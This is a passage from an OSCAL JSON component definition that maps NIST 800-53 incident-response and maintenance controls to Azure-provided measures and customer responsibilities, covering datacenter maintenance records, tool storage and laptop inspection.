Information spillage is treated as an incident within the incident management process."}],"responsibilities":[{"uuid":"ac685af2-53e4-40cc-b7d2-93fe15750539","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-041"}],"description":"The customer is responsible for providing information spillage response training.","provided-uuid":"b486a4b3-05f3-46f3-ba71-633d1833d95c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bda14262-4dec-4588-9da2-592e173c6376","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-9.3","statements":[{"uuid":"eef41fd4-fde8-46c8-9313-63df9cd677a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-042"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ir-9.3_smt","by-components":[{"uuid":"bf4e2123-5cdb-48e1-8554-352ce7cf4d1f","export":{"provided":[{"uuid":"9faa78ef-6bac-4e54-9191-1497239d512a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-042"}],"description":"The incident management information spill cleanup process does not require shutting down systems or removing systems from the network. 
Azure personnel are able to continue carrying out assigned tasks while contaminated systems are undergoing corrective actions."}],"responsibilities":[{"uuid":"ceef553e-051d-4a2b-8060-aedf4a1107d3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-042"}],"description":"The customer is responsible for ensuring customer personnel impacted by information spills can continue carrying out assigned tasks.","provided-uuid":"9faa78ef-6bac-4e54-9191-1497239d512a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"468e487f-5a39-451a-98f7-a8ff10f474e9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-9.4","statements":[{"uuid":"feb1f9d8-19b6-4b55-922a-103e8e068807","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9.4_smt","by-components":[{"uuid":"a023aa25-e0a1-49ed-8270-5e7644ddf1fc","export":{"provided":[{"uuid":"4f2300aa-8426-43f3-8256-ac927f9a8b94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-006"}],"description":"All Azure personnel have received security awareness training requiring the reporting of an incident if they are exposed to information not within their assigned access authorization and have signed Employee Agreements (EAs) that serve as Non-Disclosure Agreements (NDAs).
"}],"responsibilities":[{"uuid":"f1bafbe9-fc99-4364-a459-fee0e1495a63","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-043"}],"description":"The customer is responsible for managing exposure of spilled information to unauthorized personnel.","provided-uuid":"4f2300aa-8426-43f3-8256-ac927f9a8b94"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"470f3062-82b9-47e3-872d-8e22ec0c4c13","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-2","statements":[{"uuid":"2407e2f0-6927-4d85-bfd2-f1a471c0759d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.a","by-components":[{"uuid":"0afed553-dd76-4914-a2f6-fdc9c4ab2a00","export":{"provided":[{"uuid":"60beb549-4a0f-4196-8a0f-e6de39a11c64","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-006"}],"description":"Microsoft has two types of assets that must be maintained: Critical Environment (CE) and Site Services: * Critical Environments is the team that provides operation and maintenance of electrical, mechanical, and physical systems that comprise the operating infrastructure of the facility. Examples include generators, UPS, Fire Detection and Suppression systems, and HVAC systems. 
* Site Services is the team that provides the servicing of Microsoft online services assets (i.e., physical servers, network devices, etc.) located at the datacenter. The Site Services team provides break/fix and deployment services based on the issuance of a work ticket. Microsoft captures maintenance records in the maintenance tracking tool for CE equipment and the workflow ticket tracking system for Site Services. The tool records the date and time of the maintenance, the name of the individual performing the maintenance along with details on the maintenance being performed, and any equipment being removed or replaced. If a particular maintenance activity required that someone be under escort in a restricted area, the name of the escort would be captured in the ticket. Critical Environment Equipment The Critical Environment (CE) team schedules, performs, documents, and reviews all maintenance activities performed on CE assets. Azure datacenters rely on a computerized maintenance management system to manage maintenance schedules and work order management. Microsoft Global Maintenance Standards which are a combination of OEM guidelines, NFPA708, IEEE, historical site data and expertise. Work orders are generated based on original equipment manufacturer (OEM) guidelines and assigned for completion. All maintenance work performed at an Azure datacenter must follow approved instructions captured in a Method of Procedure (MOP) document. A MOP must have datacenter management approval before work can begin. Completed MOPs are reviewed and receive datacenter management sign-off to indicate completion. Details of completed MOPs are stored in the appropriate workflow ticketing tool and then the work order is closed. The workflow ticketing tool is used to document and track all maintenance on CE equipment. CE maintenance activities also require peer reviews of the MOPs as a verification of completeness and quality assurance. 
The peer reviews verify that any required configurations or security settings are correctly in place before completion of the maintenance. During monthly review meetings with the CE team, Datacenter Management reviews and verifies all CE work that was completed in the previous month. Site Services The Site Services team provides a smart hands and break fix service for assets belonging to properties provisioning services from the datacenter. For example, assets requiring physical maintenance could request smart hands service from the Site Services team. All Site Services work on assets is scheduled, performed, documented, and reviewed in work tickets within the workflow ticketing tool. No work can occur without an approved work ticket. The Site Services team follows detailed procedure documents that define step by step instructions for specific service requests. As part of the procedure documents, one of the final steps is to perform a Quality Control check to ensure that all steps were completed and that required security settings are in place."}],"responsibilities":[{"uuid":"4fec64ad-eab9-47ed-8a77-2725c4bc0a6f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for scheduling, performing, documenting, and reviewing remote maintenance and repair records for all customer-deployed operating systems in accordance with organizational requirements.","provided-uuid":"60beb549-4a0f-4196-8a0f-e6de39a11c64"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"73d3ff94-621c-4e5f-981f-862cae158a28","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.b","by-components":[{"uuid":"80b00a5e-35d5-44fb-ba6c-a8994bcd03b2","export":{"provided":[{"uuid":"d4c31178-10b3-472a-b5e5-096fb8b6c9ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-007"}],"description":"Critical Environment Equipment Datacenter Management consists of Microsoft personnel who serve in the following roles: Datacenter Campus Director, Datacenter Operations Manager (DCOM), IT Operations Manager (ITOM), Critical Environment Operations Manager (CEOM), Senior Electrical Engineer (EE), Senior Mechanical Engineer (ME), Critical Environment Program Manager (CEPM), Instrumentation Engineer (IE), EHS Manager, Energy Marshall, and Datacenter Project Manager (DCPM). The CEOM, CEPM, EE and ME are responsible for work occurring in the DC critical environment. CE maintenance is prescribed in required step by step documents called Methods of Procedure (MOP). MOPs are reviewed and approved by datacenter management prior to any work beginning. MOPs serve as the checklist for the maintenance procedure and the documentation of the work completed. CE maintenance is performed in areas of the datacenter that are controlled and protected by physical security mechanisms, including, but not limited to, approved access, cameras, multifactor authentication, access smart cards, biometrics, and security patrols. 
Site Services The DCOM, ITOM and/or SOM are responsible for all Site Services work that occurs in the datacenter or for work that requires the asset to be transferred offsite. Site Services maintenance is performed in areas of the datacenter that are controlled and protected by physical security mechanisms (e.g. approved access, cameras, 2FA: access smart cards, biometrics, security patrols)."}],"responsibilities":[{"uuid":"882417f8-34be-4e4b-af5d-deab1f440abc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for approving and monitoring of all remote maintenance activities performed on customer-deployed operating systems.","provided-uuid":"d4c31178-10b3-472a-b5e5-096fb8b6c9ab"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2b22413c-f683-4c6d-af03-319cb1e5e116","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.c","by-components":[{"uuid":"707c3b7f-999e-499a-b941-8f49bf8f8185","export":{"provided":[{"uuid":"15db5899-fbc1-42c0-836d-5f8596de1c8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-008"}],"description":"Critical Environment Equipment If CE components are required to be removed from the facility, handling of the equipment is approved by Datacenter Management. In most instances, CE components receive onsite maintenance and are not removed from the facility. 
Site Services Property assets (e.g. Azure network device or server) requiring transfer offsite must have explicit asset owner (e.g. O365 asset owner) approval."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"9e3f2a2b-c101-47b9-8dbe-eb94a33c3d57","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.d","by-components":[{"uuid":"b2d9e5a5-001f-4e08-bf91-8ca90396be67","export":{"provided":[{"uuid":"a444c6d0-e9d9-4f10-a461-53b32e0ffb45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-009"}],"description":"Data Bearing Equipment and Site Services Assets that are to be destroyed are stored in locked storage bins that are under CCTV camera coverage. When the assets are ready to be destroyed, a physical security officer and a Microsoft full time employee (FTE) from Asset Management must escort the locked bin from the Azure colocation to where the onsite shredding is to occur. As shredding occurs at the datacenter and under Microsoft supervision, Azure assets do not leave the controlled areas of the datacenter. 
Any production device that is to be removed off-site with drives intact requires a policy exception."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"669089e4-b2f8-4816-9a0c-d0036adda90c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.e","by-components":[{"uuid":"73bdc285-1dcd-472f-83a0-38689253e53f","export":{"provided":[{"uuid":"5dc6225d-fda4-438e-8e83-b8a523e6194d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-010"}],"description":"Critical Environment Equipment CE maintenance activities also require peer reviews of the MOP checklist as a verification of completeness and quality assurance. The peer reviews verify that any required configurations or security settings are correctly in place before completion of the maintenance. During monthly review meetings with the CE team, Datacenter Management reviews and verifies all CE work that was completed in the previous month. Site Services The Site Services team follows detailed procedure documents that define step by step instructions for specific service requests. As part of the procedure documents, one of the final steps is to perform a Quality Control check to ensure that all steps were completed and that required security settings are in place. 
Any logical access required to Azure assets is performed per the authentication process."}],"responsibilities":[{"uuid":"eb0c6e8a-eb5f-4857-92fd-eb6df13b5939","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for identifying potentially impacted security controls and the process used for verifying those controls are still functioning properly following remote maintenance/repair activities on customer-deployed operating systems.","provided-uuid":"5dc6225d-fda4-438e-8e83-b8a523e6194d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3b640322-6746-4fd6-a76d-212dfd92b233","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.f","by-components":[{"uuid":"a3f176ee-1ccb-4131-991d-562bc8b1b991","export":{"provided":[{"uuid":"805c7a37-9f43-4f51-9b83-7dc7c3f5d8ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-011"}],"description":"Azure captures maintenance records in the workflow ticket tracking system for Site Services and the maintenance tracking tool for CE equipment. The tool records the date and time of the maintenance, the name of the individual performing the maintenance along with details on the maintenance being performed, and any equipment being removed or replaced. 
If a maintenance activity requires that someone be under escort in a restricted area, the name of the escort is captured in the DCAT ticket of the person under escort."}],"responsibilities":[{"uuid":"03cc4923-c930-4da4-83a1-9aa2a2550d42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-011"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for including customer-defined remote maintenance-related information for customer-deployed operating systems in organizational maintenance records.","provided-uuid":"805c7a37-9f43-4f51-9b83-7dc7c3f5d8ec"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1208571c-8e7b-49c9-9e9b-1502409c5cf7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-2.2","statements":[{"uuid":"45ddc40b-0db9-40cd-8c23-3cb88a756d0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-012"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2.2_smt.a","by-components":[{"uuid":"0fdfec8c-1764-4db5-8546-74c4404cf5d3","export":{"provided":[{"uuid":"b015a8c3-a800-4d9e-a76a-305f016c5e4c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-012"}],"description":"Critical Environment Equipment: Azure datacenters rely on a computerized maintenance management system to manage maintenance schedules and work order management. Site 
Services: All Site Services work on Azure assets is scheduled, performed, documented, and reviewed in work tickets within the workflow ticketing tool. No work can occur without an approved work ticket."}],"responsibilities":[{"uuid":"4fc57a9c-40b2-4c7e-a4d1-9c7eed9db339","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-012"}],"description":"The customer is responsible for automating remote maintenance activities to schedule, conduct, and document remote maintenance and repairs of customer-deployed operating systems.","provided-uuid":"b015a8c3-a800-4d9e-a76a-305f016c5e4c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"eb9a38e1-9c2d-4e1f-88d9-5de4da16edae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-013"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2.2_smt.b","by-components":[{"uuid":"829aa9c3-9f0c-4f72-b2d6-df28f18bc09e","export":{"provided":[{"uuid":"55628b0c-3b6d-46f2-a09a-b4b17d472acc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-013"}],"description":"Critical Environment Equipment: The maintenance ticketing tracking tool is used to document and track all maintenance on CE equipment. Site Services: All Site Services work on Azure assets is scheduled, performed, documented, and reviewed in work tickets within the workflow ticketing tool.
"}],"responsibilities":[{"uuid":"700d4b69-fd95-4dac-aadb-c6ecff31b1e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-013"}],"description":"The customer is responsible for automating remote maintenance activities, including the production of up-to-date, accurate, and complete records of all remote maintenance and repair actions requested, scheduled, in process, and completed for customer-deployed operating systems.","provided-uuid":"55628b0c-3b6d-46f2-a09a-b4b17d472acc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e2692590-d9fa-47b6-9d4b-5d07aa2e81dc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-3","statements":[{"uuid":"6f8b0026-d50f-4f05-9b12-417230d37336","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-3_smt.a","by-components":[{"uuid":"fec83cd9-1e22-4036-b767-8272e24e6180","export":{"provided":[{"uuid":"d6de930c-5e61-4f51-9db0-946a4b50d26c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-014"}],"description":"All maintenance work must be approved prior to work beginning. Azure implements maintenance tools control by creating an access level within the Datacenter Access Tool (DCAT). 
Each facility contains a restricted physical lock box or access-controlled room for the storage of specialized maintenance tools, such as Fluke ether scopes, Fluke fiber channel testers, Ethernet toners, etc. Access to the lock box or storage room is controlled using the DCAT tool to prohibit unauthorized access to the maintenance tools. This ensures that only personnel with approved access can access the tools. Third-party maintenance personnel may provide their own calibrated tools or assets where necessary. The same access controls in DCAT that limit access to the on-site tooling are also in place for all work areas where Critical Environment (CE) assets are present. Azure limits where any personnel can go and what doors they can open. To access the work site, they must follow CE procedural requirements. The Site Services team performs routine inventory checks to verify the status of all tools. Access to the lock box or maintenance storage room is tracked in the access smart card reader logs, which are available in the event of an investigation. On a quarterly basis, the datacenter management team and physical security teams perform audits of the DCAT access list to keep the access list of maintenance personnel current. Personnel terminations or transfers are reflected immediately through a manual update of the access list. In addition, for logical access, maintenance is performed through the utilization of the SI, CM, AC, AU, and IR control families mentioned in this System Security Plan (SSP) document. Logical maintenance is performed through configuration management, access management, monitoring, and incident response tooling and processes. 
The tooling leveraged includes ASM, SCUBA, Microsoft Entra ID (formerly AAD), JIT, build services, and incident response ticketing services."}],"responsibilities":[{"uuid":"58de2873-0c58-4272-8ddb-d34e718bb5bf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-014"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for approving, controlling and monitoring system maintenance tools used on customer-deployed operating systems.","provided-uuid":"d6de930c-5e61-4f51-9db0-946a4b50d26c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a45e1e25-db93-49fb-bff0-68525c5db13e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-3_smt.b","by-components":[{"uuid":"47f53718-b853-41ba-ab82-26237a6139d6","export":{"provided":[{"uuid":"db0bb624-7634-47a8-a336-864974621dbd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-015"}],"description":"The Site Services team performs routine inventory checks to verify the status of all tools. Access to the lock box or maintenance storage room is tracked in the access smart card reader logs, which are available in the event of an investigation. On a quarterly basis, the datacenter management team and physical security teams perform audits of the DCAT access list to keep the access list of maintenance personnel current. Personnel terminations or transfers are reflected immediately through a manual update of the access list. 
In addition, for logical access, maintenance is performed through the utilization of the SI, CM, AC, AU, and IR control families mentioned in this System Security Plan (SSP) document. Logical maintenance is performed through configuration management, access management, monitoring, and incident response tooling and processes. The tooling leveraged includes ASM, SCUBA, Microsoft Entra ID (formerly AAD), JIT, build services, and incident response ticketing services."}],"responsibilities":[{"uuid":"8218f14e-3c9c-4021-9ba9-f650cfc18286","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-015"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing previously approved system maintenance tools at customer-defined frequency for customer-deployed resources.","provided-uuid":"db0bb624-7634-47a8-a336-864974621dbd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1fe4a738-1a71-4d43-b1fd-cfa70e3532f5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-3.1","statements":[{"uuid":"c89fa816-6b42-4fde-b307-13c1b6d8ac70","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.1_smt","by-components":[{"uuid":"2dcfd10e-f43d-449a-b8be-bb5d9b33f839","export":{"provided":[{"uuid":"b003ff0e-bc7a-442b-b011-7fb70cef61ce","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-016"}],"descr
iption":"The Site Services team maintains an inventory of approved maintenance tools for use within the datacenter. Maintenance personnel are directed to use the provided maintenance tools. Datacenter Management (DCM) approval is required to use tools not provided by the datacenter. Physical hand tools such as screwdrivers, wrenches, etc., are exempt from this control."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"2a9e13c6-fba6-4164-8bd2-5e09cc86837b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-3.2","statements":[{"uuid":"b39a7d15-5456-46f4-b19f-f4bd3ea31430","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-017"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-3.2_smt","by-components":[{"uuid":"2f89e3b3-0414-44ad-9894-c61ee2fdf1e3","export":{"provided":[{"uuid":"acb6d8d8-f2ca-4903-a3c1-dbc405bf7cbb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-017"}],"description":"Use of mobile computing or storage media is prohibited in the production environment of Azure datacenters without datacenter management approval. Personally owned media is prohibited from being used in the production environment of Azure datacenters. Azure implements a process to inspect laptops and other mobile devices prior to being used in the production environment of Azure datacenters. 
The process requires that personnel from Site Services inspect laptops to validate that a full anti-virus scan has been performed within twenty-four (24) hours of the datacenter visit, that the virus definition files are current, and that real-time scanning is configured. Laptops that have been validated are marked with an inspection sticker. Security officers are trained to challenge personnel using laptops in the production environment to verify that the laptops have undergone and passed inspection."}],"responsibilities":[{"uuid":"520882ed-f76c-42ce-9894-faedc1dbf91a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-017"}],"description":"The customer is responsible for checking media containing maintenance diagnostic and test programs for malicious code prior to deployment on customer-deployed operating systems.","provided-uuid":"acb6d8d8-f2ca-4903-a3c1-dbc405bf7cbb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7184a2fb-6ff8-412f-b5bd-b18f7ce7cb34","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-3.3","statements":[{"uuid":"c810bfa4-7830-4826-8d44-4ec09ee6bf86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-018"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.3_smt.a","by-components":[{"uuid":"5079c013-2414-49b6-9a8b-12e16f9190aa","export":{"provided":[{"uuid":"ebafe00f-462a-4566-8b2e-60e729f45d8b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","nam
e":"acf-id","value":"MA-09-018"}],"description":"Maintenance tools are datacenter-specific; they are not removed and are retained within the facility. Each facility contains a restricted physical lock box or storage room that stores maintenance tools, such as Fluke ether scopes, Fluke fiber channel testers, Ethernet toners, etc. Access to the lock box or storage room is controlled in DCAT to prohibit unauthorized access to the maintenance tools."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"aad04b84-c4e5-40ec-baeb-b2f0f16856a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-019"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.3_smt.b","by-components":[{"uuid":"b57ce558-fc86-4c09-b3df-529b7d839677","export":{"provided":[{"uuid":"71bb15fc-3f29-4d65-a403-c9f2e827099f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-019"}],"description":"Maintenance tools are datacenter-specific; they are not removed and are retained within the facility. Each facility contains a restricted physical lock box or storage room that stores maintenance tools, such as Fluke ether scopes, Fluke fiber channel testers, Ethernet toners, etc. 
